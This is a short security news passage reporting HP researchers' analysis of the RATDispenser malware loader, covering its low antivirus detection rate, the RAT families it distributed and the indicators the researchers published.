The loader is highly evasive, at the time of the analysis, it had only 11% detection rate on VirusTotal, HP experts confirmed that it was employed to distribute at least eight RAT families during 2021 (STRRAT, WSHRAT, AdWind, Formbook, Remcos, Panda Stealer, GuLoader, and Ratty). The experts believe that the threat actors behind the RATDispenser may be operating a malware-as-a-service model.
HP researchers run a retrohunt over the last three months with this YARA rule and identified 155 RATDispenser samples, belonging to a three different variants. The experts also developed a wrote a Python script to recover the final payload and discovered that:
- 145 of the 155 samples (94%) were droppers. Only 10 samples were downloaders that communicate over the network to download a secondary stage of malware
- 8 malware families delivered as payloads
- All the payloads were remote access Trojans (RATs), keyloggers and information stealers
STRRAT and WSHRAT accounted for 81% of the samples analyzed by the researchers. “Using each sample’s earliest scan result, on average the RATDispenser samples were only detected by 11% of available anti-virus engines, or eight engines in absolute numbers.”
HP researchers published a set of hashes, URLs, YARA rule and extraction script in the HP Threat Research GitHub repository.
(SecurityAffairs – hacking, RATDispenser)